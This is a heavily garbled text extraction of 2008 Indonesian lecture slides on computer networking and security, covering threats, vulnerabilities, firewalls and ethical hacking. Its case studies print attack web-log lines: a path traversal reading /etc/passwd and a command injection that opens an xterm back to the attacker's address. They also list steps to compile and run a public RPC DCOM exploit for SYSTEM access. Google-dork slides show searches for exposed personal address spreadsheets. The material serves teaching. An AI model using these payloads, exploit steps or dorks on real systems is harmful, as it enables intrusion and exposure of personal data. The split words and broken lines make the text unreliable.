Computer Network and Security

Published on March 2017 | Categories: Documents | Downloads: 195 | Comments: 0 | Views: 385
of 76
Download PDF   Embed   Report

Comments

Content

Computer Networking
and
Security

RUDI LUMANTO

STMIK NUSA MANDIRI

RUDI LUMANTO

STMIK NUSA MANDIRI
November 2008

Referensi dan Kontak Info
)
)

)
)

Glenn Berg“Networking Essentials”, New
Riders
Deborah Russel, G.T Gangemi Sr,
“COMPUTER SECURITY
BASIC”,
O’Reillyy & Associates
John E Caravan, “FUNDAMENTALS OF
NETWORK SECURITY”, Artech House
internet

KONTAK : RUDI LUMANTO
[email protected]
0815-1036-9754
0815
1036 9754
STMIK NUSA MANDIRI
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

KRITERIA PENILAIAN
) TUGAS

(2-4 report) : 20%
) UJIAN TENGAH SEMESTER : 30%
%
) ABSENSI KEHADIRAN : 10 %
) UJIAN AKHIR SEMESTER : 40%

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

DAFTAR SILABUS
) Overview
) Network

standards (OSI)
) Network components
) Network p
protocol (TCP/IP)
(
)
) Network OS and Services
) Network/Internet Security

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

DAFTAR SILABUS
) Software

threats : virus,
virus worm etc
) Internet threats: TCP attack, DNS, DOS etc
) Firewall
i
ll andd Intrusion
i Detection
i System
S
(IDS)
) Cryptography and its applications
) VPN

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

COMPUTER
NETWORKING and
SECURITY
OVERVIEW

Standar

Keamanan
Jaringan

Komponen Jaringan

Ancaman Internet : TCP
Attack, DOS, DNS dll

Protokol (TCP/IP)

Ancaman Sofware :
Virus, Worm dll

OS dan Layanan
Jaringan

Firewall dan IDS

Cryptography dan
Aplikasi

VPN

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

COMPUTER NETWORKING and
SECURITY

1 OVERVIEW
1.

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

outline
) Simple

cases and tools
) Why
y Computer
p
Networking
g and Whyy
Security ?
) Computer Security Goals.
Goals
) Threats, Vulnerabilities, Attacks
) Policy
li andd measure
) Making a good security policy
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Simple case and tool
( seing the
technique/informasition
behind a case)

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

A Security Case
A company called “Acme-art. Inc” doing an online business in the internet. They
have a database that record all customers information included their credit card
i f
information
i andd connectedd to their
h i site
i www.acme-art.com that
h protected
db
by fi
firewall.
ll
31 October 2001 a hacker intrude to their system and stole all credit card information,
Then put the information into newsgroup usenet. A few hour then the company has
loss million dollars , bad reputation and have to invest many more money to keep their
business alive.

What happen ?
How it could be happen ?

Fact : The firewall is installed. And the internet access can
only be done through http port 80.
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Security team investigation:

Sample case 1

Looking for clues in log file…
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
10.0.1.21
10
0 1 21 - - [31/Oct/2001:03:03:13 +0530] "GET
GET /index.cgi?page=falls.shtml
/index cgi?page=falls shtml HTTP/1.0
HTTP/1 0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580

A

B

10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272

C

10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

D

10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd
HTTP/1.0" 200 358

E

10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
HTTP/1 0" 200 1228
HTTP/1.0"
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0
+%26| HTTP/1.0" 200 1228

F

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Security team investigation:

Sample case 1

Part A in log file
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

Browsingg …….

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Security team investigation:

Sample case 1

Part B in logg file
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10 0 1 21 - - [31/Oct/2001:03:03:18 +0530] "GET
10.0.1.21
GET /tahoel
/tahoel.jpg
jpg HTTP/1
HTTP/1.00" 200 36580

Browsing …….

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Security team investigation:

Sample case 1

Part C in log
l file
fl
10.0.1.21 - - [[31/Oct/2001:03:03:41
/ /
+0530]] "GET //cgi-bin/
g
/ HTTP/1.0"
/
403 272

T i direct
Trying
di t access ….
Error response

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Security team investigation:

Sample case 1

Part D in logg file
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

Attacking …

Security
Hole
1

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Security team investigation:

Sample case 1

Perl script

Security hole 1: validation form for parameter variable will be transfer to index.cgi script
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Security team investigation:

Sample case 1

Part E in log file
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd
HTTP/1.0" 200 358

Attacking …

Security
Hole
1

Recovering passwd file
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Security team investigation:

Sample case 1

Passwd file
root:x:0:0:root:/root:/bin/bash
……
……
……
Lion:x:500:500::/home/lion:/bin/bash

Security hole 1 effect: recovering important “passwd” files
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Security team investigation:

Sample case 1

Part F in log file
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0
+%26| HTTP/1.0" 200 1228

Attacking …

Security
Hole
2

Direct execution to
server commands
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Security team investigation:

Sample case 1

10.0.1.21 - - [[31/Oct/2001:03:17:29
/ /
+0530]] "GET //index.cgi?page=|xterm+g p g |
display+10.0.1.21:0.0
p y
+%26| HTTP/1.0" 200 1228

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Information/technique behind
the case
) Understanding

about computer and network
) Information about target
g
) HTTP Structure
) CGI/PERL
) LINUX system and its command

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Httpd file default structures Æ what is the web site structure ?

Lisv01

/(root)

h
home

var

u01 u02 u03 …

www

sbin
bi

bin
bi

html

(default user’s directory)

(default document root)

etc
httpd

log

public_html

dev
d

httpd

usr …
init.d

conf
httpd

httpd.conf
*Document root : The directory that holds HTML documents.
*
: file
11

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Behind the Web
Client-side application
WWW server
WWW
browser
Internet/
Intranet

WWW
server software
server_software

Execute application

N t
Network-loading
k l di application
li ti
WWW
browser
Application

Internet/
I t
Intranet
t

HTML
&
Script

JAVA SCRIPT
WWW server

WWW
server software
server_software

A li ti
Application

WWWブラウザ
Execute application

JAVA Applet,
Active X

S
Server-side
id application
li ti
WWW
browser
Internet/
Intranet

WWW server

WWW
Server
_software

Application

CGI,
CG
Active Server Pages
Execute application

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

S
Sampe
case 2

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Sample case 2

After a period of new reqruitment,
a server in a company suddenly crash down.
Company network become unavailable for
a while and it led to the much loss in production.
What happen ?
How it could be happen ?
No Log files indication !!!

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Sample case 2
Security team investigation: Looking for clues by social engineering
One new employee
O
l
iinstallll the
h windows
i d
2000 server in
i his
hi computer andd connect to
the LAN with global IP address.
Other Clues :

1. Nessus report on vulnerabilies in windows 2000
2. exploit program available
Analysis of Host

Nessus report
p on
Windows 2000 server
after IIS installation

RUDI LUMANTO

Address of Host

Port/Service

Issue regarding port

192.168.27.31

ftp (21/tcp)

Security hole found

192.168.27.31

smtp(25/tcp)

Security hole found

192.168.27.31

http (21/tcp)

Security hole found

192.168.27.31

nntp (119/tcp)

Security hole found

192.168.27.31

msrpc(135/tcp)

Security hole found

192.168.27.31

Netbios-ssn (139/tcp)

Security not found

192.168.27.31

https (443/tcp)

Security not found

192.168.27.31

Microsoft-ds (445/tcp)

Security hole found

……

….

….

……

….

….
STMIK NUSA MANDIRI, November 2008

Sample case 2

NESSUS report in detail
Other references: IAVA:2003-A-0012
NESSUS ID:11835
Vulnerability

msprc(135/tcp)

The remote host is running a version of windows which has a flaw in its
RPC interface which may
y allow an attacker to execute arbitrary
y code
and gain SYSTEM privileges. There is at least one WORM which is
currently exploiting this vulnerability. Namely, the MsBlaster worm.
Solution : see
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor: high
CVE:CAN-2003-0352
BID:8205
Other referemces: IAVA:2003-A-0011
NESSUS ID: 11806

Warning

RUDI LUMANTO

msprc(135/tcp)

Distributed Computing Environment (DCE) services running on the
remote host

STMIK NUSA MANDIRI, November 2008

Sample case 2
NESSUS ID : Identity Number of Vulnerability Check by NESSUS
BID : Buqtraq ID : related documentation regarding the vulnerability including
exploit code , see: security focus site
simulation
1. Downloading the exploit code source file (from security focus site or Whoppix CD)
$cp
p /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c
p
p
y
2. Compiling source file
$gcc oc192-dom.c
3. executing the exploit into the IP target machine
$a out -dd 192.168.94.204
$a.out
192 168 94 204
Get the system access

C:>WINNT\SYSTEM32\

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Information/technique behind
the case
-Understanding about network
-Insufficient security orientation for new employee
-Lack
L k off knowledge
k
l d about
b t OS
-There is always exploit code in the internet
-Lack of information about update

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Why Computer Network ?

1. File sharing Æ memungkinkan akses terhadap sebuah file kapan saja dan
j
dimana saja
2. Effective data transfer ÆPengiriman data dengan cepat dan efisien
3. Hardware sharing Æ Dapat menggunakan bersama satu printer, hardisk dsb
4. Realtime communication Æ Dapat melakukan hubungan komunikasi via teks,
audio gambar ataupun video secara realtime
audio,
5. Operational cost reduction Æ mengurangi biaya komunikasi telpon, pemakaian
kertas, pengiriman surat dsb.
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

File/Information resources sharing
g

Information resources : printer, data, files
Users can share a printer connected to LAN.
There is no need to connect to a printer to
each printer
Users can share data on the computers,
User in computer C can handle files on
Computer B as if they were his own files

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Effective data transfer

-

The data transmission speed is scores to several hundred Mbps. For example, A4 sized document
(30Kbytes) can be transmitted over a LAN in 0.024 second.

bps (bits per second) = a unit rate at which data can be transmitted over a communication line expressed
as the number of bits transmitted per second. 9600 bps means 9600 bits are transmitted in one
second.

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Hardware sharing

- Effective use of hardware ((Printer, Hard disk etc))
- Easy to add new computers or relocate existing computers
- Easy to connect to computers of different vendors
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Contoh Kegunaan Jaringan
Seat Reservation Network

- Inquiries are issued from various places
- Connected to seat reservation database
on the central computer
- Answer to inquiries are generated
Immediately
- Also in updating databases and issues
a ticket
Example of similar system:
money withdrawal, balance inquiry etc

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Type
yp of Network
Mainly divided into 2 types based on
their scale (area that a network
covers).
LAN is implemented within a building
or Factory.
WAN is implemented by connecting
two or more LAN between office
and laboratories, or two countries

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Why Computer Security
)

T protect
To
t t company/individual
/i di id l assets
t
– Hardware, software and INFORMATION (data, ability
and Reputation)

)

To gain a competitive advantage
– How manyy ppeople
p will use a bank’s internet bankingg
system if they knew that the system had been hacked in
the past ?

)
)

RUDI LUMANTO

To comply
l with
i h regulatory
l
requirements
i
To keep your job

STMIK NUSA MANDIRI, November 2008

Computer Security Goals
)
)
)

C onfidentiality
I ntegrity
A vailability
il bilit

Confidentiality : Prevention of unauthorized access to data, and accidental data
disclosures
Integrity : Prevention of improper modifications of the data, either intentionally or
accidentally. 1) Modification of the data by unauthorized parties.
2) O
Operation
ti on d
data
t b
by authorized
th i d personnell iin ways th
thatt iis incompatible
i
tibl
with the nature (syntax) of the data, leading to its corruption.
3) Any modification to append-only records, to alter their evidence value.
protect data should not result in making
g it difficult
Availabilityy : Measures to p
to access and modify the data in ways in which it was intended.
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Threats,vulnerabilities and Attacks
THREATS

Anything that can disrupt the operation,
operation
functioning, integrity or availability of
computer system
system.
) Stand

alone threats

– Threat arise without any connection to other system, Ex:
virus password cracker
virus,

) Connection

threats

– Threat arise because of connection to other system

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

◆Threats Arising from Connection to the other computers

Information leaks •• A database of customer information, including credit card
numbers is leaked from an Internet service provider
numbers,
provider.

Falsification

Denial of services

•• The contents of the web site of a public institution are
rewritten with the political messages of a dissident group.

•• A bookshop site is attacked and its server goes down,
discontinuing
d
sco t u g se
service.
ce

Impersonation

•• An intruder fakes a membership site for the purchase of
merchandise.

Attack platform

•• A corporate network administering a server used as a platform
for attacking other sites was sued for compensation for the
damage caused.

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Vulnerabilities
Weakness in the design, configuration or
implementation of a computer system that
renders it susceptible to a threat.
1. POOR DESIGN
Hardware and software system that contain design flaws that can be
exploited Ex: sendmail flaws in early version of unix that allowed
exploited.
hackers to gain privileged root access

2. POOR IMPLEMENTATION
System that incorrectly configured because of in-experience,
in-experience insufficient
training or sloppy work. Ex: a system that does not ave restricted access
Privileged on critical executable file.

3. POOR MANAGEMENT
Inadequate procedures and insufficient checks and balances.
Ex: No documentation and monitoring
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Critical Vulnerabilities and
Vulnerability Scanning
) Certain

security vulnerabilities are declared
critical when they are (or are about to)
being actively exploited and represent a
clear and present danger
) Upon notification of a critical vulnerability,
systems
y
must be patched
p
byy a ggiven date or
they will be blocked from network access

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

◆Types of Vulnerability
OS/Program name

Cause

Influence

Index Server ( WindowsNT)
Index Service (Windows2000)

ISAPI extension idq.dll
overflow

Local system permission
seized by an outsider

telnetd ((FreeeBSD 4.3 and
earlier, Red Hat 7.1 and
earlier, etc.)

Buffer overflow during
g AYT
optional packet processing

Telnetd p
permission ((normally
y
root) seized by an outsider

sadmind (Solaris2.3 – 7)

Buffer overflow during
NETMGT_PROC_SERVICE
request processing

Command executable with
root permission by an outsider

SSH 1.2.31 OpenSSH 2.2 and
earlier

Overflow in an int variable in
detect_attack function

Command executable with
root permission by an outsider

dtspcd
p ((AIX 4.3/5.1, HP-UX
11.11, Solaris 8, etc.)

Buffer overflow in a shared
library

Arbitrary
y command
executable with root
permission by an outsider

Bind8.2x(Red Hat, Turbolinux,
Solaris, AIX , etc.)

Buffer overflow during TSIG
processing

Operation permission
(normally root) seized by an
outsider

wu-ftpd 2.6.0 and earlier (Red
Hat linux 6.2 and earlier, etc.)

Format string bug in site-exec
and setproctitle functions

Execution permission
(normally root) seized by an
outsider

IIS4.0 (WIndowsNT)
IIS5.0 (Windows2000)

Access to a file outside root
directory permitted when path
name is UNICODE

Shell command executed with
IUSR_Machinename
permission by an outsider

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

ATTACKS
A specific technique used to exploit a vulnerabilty.
Ex: a threat could be a denial of service,, a vulnerabilityy
is in the design of OS, and an attack could be
a “ping of death”

) Passive attacks
– Gathering information by monitoring and recording
traffic on the network, or by social engineering. Ex:
packet sniffing
sniffing, traffic analysis

)Active

attacks

– Overt actions on the computer system.
system
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

◆Denial of Service
Target host
Target host

Service downed
due to overload

• Large volume data
• Packets causing
a system down

Attack platform

Start attack!!

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Policy and Measure
)

Security Trinity : foundation for all security policies
and measures that an organization
g
develops
p and deploy
p y

Security
Prevention

RUDI LUMANTO

What is Security ?
Definitions from the Amer.Herit.Dic :
- Freedom from risk or danger:safety
- Measures adopted …. To prevent
a crime.
Computer Security Measures
-Mechanisms to prevent, detect and
recover from threats and attacks or
for auditing purposes.

STMIK NUSA MANDIRI, November 2008

Key point
Computer Security is not only a technical
problem it is a business and people
problem,
problem.
Th ttechnology
The
h l
iis th
the easy part,
t th
the diffi
difficult
lt
part is developing a security policies/plan
th t fits
that
fit the
th organization’s
i ti ’ business
b i
operation and getting people to comply with
th plan.
the
l
ÆSocial engineering
g
g : non-technical methods hackers employ
p y to g
gain access to
system, refers to the process of convincing a person to reveal information
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Security operations
-Prevention againts
g
accidental capture
p
or modification of
information

Detection of all improper access to data and system resources
-Recovery
R
from unauthorized access, restoring data values,
-

system integrity etc

Policies and Procedures
-User
U
privileged
i il
d
-Data backup
-Security tools to deploy
-Monitoring
Monitoring the integrity
-Response to Incident
-User role, etc
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

◆Types of Users
Hacker
Cracker
Script kiddy

A user who tries to obtain access using
g advanced knowledge
g
and techniques.
A user who attempts sabotage and other subversive activities
with malicious motives
A user who has little technical capability and uses tools available
on the Internet when attempting cyber attacks

Corporate network

Intrusion, subversion,
sabotage

RUDI LUMANTO

Vulnerability

Subversion,
sabotage

STMIK NUSA MANDIRI, November 2008

◆Integrity Check Tool

/etc/passwd file

#hash value (MD5)
dc577ef5f97b671781c04425737bc4df

File editing/falsification

Mismatch ... Altered!!

b0ed782bbd4c8445f07538a3ede788eb

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

◆Security Tools and Security Products
Malicious user
Malicious user
C
Corporate
t network
t
k

Server/client

Internet

Network security

Server security

Countermeasures
against hacking

• Router(Filtering)
• Firewall(VPN)
• N-IDS
• Vulnerability audit

• H-IDS
• Log monitoring
• Falsification prevention
• Vulnerability audit

Miscellaneous

• Virus scan
• Encryption

• Virus scan
• Encryption(SSH)

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

◆Firewall?
I t
Internet
t

Intranet
Public WWW
server

① HTTP
② HTTP
Client

Public FTP
server

③ FTP

④ HTTP
⑤Unspecific AP
Server

Client

Authentication

• Packet
P k t filt
filtering
i
GW type firewall

• Application gateway
• Stateful inspection

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

◆Encryption

VPN(Virtual Private Network)=Leased Line
the Internet e.g. IPsec IPv6
Remote
access user

FW/VPN
router

Encrypted
communication
Provider C

Provider A

IX

Internet

Provider B

Provider D

FW/VPN
router

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Making
g a good
g
security
y
policy

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Making a good security policy
) Penetration

Test/Ethical Hacking

– Understandingg what is inside the hackers
mind
) Security
y

Trinityy
) Security Goals

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Definition of "Ethical Hacking“
An ethical
A
thi l h
hacking
ki iis where
h
a computer
t and
d network
t
k expertt who
h
attacks a security system on behalf of its owners, seeking
vulnerabilities that a malicious hacker could exploit. To test a security
system ethical hacking uses the same methods as their less
system,
principled counterparts, but report problems instead of taking
advantage of them. Ethical hacking is also known as penetration
testing intrusion testing
testing,
testing, and red teaming
teaming. Individuals involved in
ethical hacking is sometimes called a white hat, a term that comes
from old Western movies, where the "good guy" wore a white hat
and the "bad g
guy"
y wore a black hat.
One of the first examples of ethical hacking at work was in the 1970s,
when the United States government used groups of experts called
red teams to hack its own computer systems. According to Ed
Skoudis, Vice President of Security Strategy for Predictive Systems'
Global Integrity consulting practice, ethical hacking has continued to
grow in an otherwise lackluster IT industry, and is becoming
i
increasingly
i l common outside
t id th
the governmentt and
d ttechnology
h l
sectors where it began. Many large companies, such as IBM,
maintain employee teams of ethical hackers.
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Inside the Hackers Mind
- Successfully
S
f ll attackk andd Save
S
-

) Focus

on the target
) Never use your own information
) Never leave y
your footstepp
) Can ever back again

HACKERS PROCEDURE

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Hackers Procedure/step
) Targeting
) Scanning
) Remote Attack

1. Information gathering

) Local Attack

2. Attack, intrusion

) Log

removing / deception
) Space using
) Time stamp
) Back door

RUDI LUMANTO

3. Unauthorized act
4. Actions taken after
unauthorized act

STMIK NUSA MANDIRI, November 2008

Example of Targeting
All Informations about the target
)
)
)

Technique name : Web browser targeting
Goals : personal information about the target
Operation base - any web browser with search engine site
(google)
- online database (WHOIS, IPCONVERSION,etc)

Location, related company/organization, news, telephone number,
Contact (mail address), web author idea/though,/behaviour, site software

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Targeting with google

Byy usingg the basic search techniques
q
combined
with Google's advanced operators, anyone can
pperform information-gathering
g
g and
vulnerability-searching using Google. This
q is commonlyy referred to as Google
g
technique
hacking.

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Google hacking
)

Mastering
g google
g g using
g its standard options
p





Double quotation ….to be recognized a keyword as a phrase
Hyphen (-) …. If you want to exclude words contain keyword
site:
i
…. searching only inside the site
*
…. wildcard. Use with double quotation to find any
indicate word

– Intitle:
– Inurl:
– Intext:
I t t
web
– Filetype:
file
– Phonebook:
RUDI LUMANTO

…. search limited only to web title
…. search limited only to web page URL
…. searchh limited
li it d only
l to
t main
i page off the
th
…. search focusing on extention type of
…. search telephone number
STMIK NUSA MANDIRI, November 2008

Google hacking
)

Mastering google using its options
– site:

…. searching only inside the site
“hacker” site:www.cnn.com or site:www.cnn.com hacker
This query searches for the
word hacker,
restricting the search to the
http://www.cnn.com
web site. How many pages on
the CNN web server contain
the word hacker

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Google hacking

)

Mastering google using its options
– *

RUDI LUMANTO

…. wildcard. Use with double quotation to find any indicate word
“He is a * Hacker”

STMIK NUSA MANDIRI, November 2008

Google hacking
)

Mastering
aste g google
goog e using
us g its
ts standard
sta da d options
opt o s
– intitle:

RUDI LUMANTO

…. search limited only to web title
intitle: “Hacker”

STMIK NUSA MANDIRI, November 2008

Google hacking
)

Mastering google using its standard options
– Inurl:

RUDI LUMANTO

…. search limited only to web page URL
inurl: www.securityfocus.com

STMIK NUSA MANDIRI, November 2008

Google hacking
)

Masteringg google
g g using
g its standard options
p
– intext:

RUDI LUMANTO

…. search limited only to main page of the web
intext: “earthquake”

STMIK NUSA MANDIRI, November 2008

Google hacking
)

Masteringg google
g g using
g its standard options
p
– Filetype:

…. search focusing on extention type of file
“hacking” filetype:ppt
" h
"whoppix"
i " fil
filetype:iso
i

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Google hacking
)

Masteringg google
g g using
g its standard options
p
– Phonebook: …. search telephone number
phonebook: John Doe CA

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

More on Google hacking

Searching the site inside (that actually) not explore to public

Finding on server directory listing
Directory listings provide a list of files and directories in a browser
window instead of the typical text-and graphics mix generally associated
with web pages. These pages offer a great environment for deep
information gathering
Most directory listings begin with the phrase
Index of
of, which also shows in the title
title. An
obvious query to find this type of page might be
intitle:index.of
which may find pages with the term index of in
the title of the document. Unfortunately, this
query will return a large number of false
positives, such as pages with the following titles:

RUDI LUMANTO

Index of Native American Resources on the Internet
LibDex—Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
STMIK NUSA MANDIRI, November 2008

More on Google hacking

C bi i google
Combination
l options
i
on queries
i
Several alternate qqueries that provide
p
more accurate results:
intitle:index.of "parent directory" intitle:index.of name size
These queries indeed provide directory listings by not only
focusing on index.of
index of in the title,
title but on keywords often found
inside directory listings, such as parent directory, name, and size.
Obviously, this search can be combined with other searches
to find
fi d files
fil off di
directories
i llocated
d iin di
directory lilistings.
i
Example:
p
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs
bbs.dat inurl:"Index of" intitle:“Index of“
RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

More on Google hacking
Example:
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

More on Google hacking
Example:
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

More on Google hacking

RUDI LUMANTO

Example:
bbs.dat inurl:"Index of" intitle:“Index of“

STMIK NUSA MANDIRI, November 2008

More on Google hacking
Example: searching database of address people written in csv focusing to japan site
Æ filetype:csv
yp
address site:jp
jp

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

More on Google hacking
Example: searching database of address people written in EXCEL focusing to UK site
Æ filetype:xls
yp
address site:uk

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

THANK YOU

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Th Dawn
The
D
off th
the Net
N t

RUDI LUMANTO

STMIK NUSA MANDIRI, November 2008

Sponsor Documents

Or use your account on DocShare.tips

Hide

Forgot your password?

Or register your new account on DocShare.tips

Hide

Lost your password? Please enter your email address. You will receive a link to create a new password.

Back to log-in

Close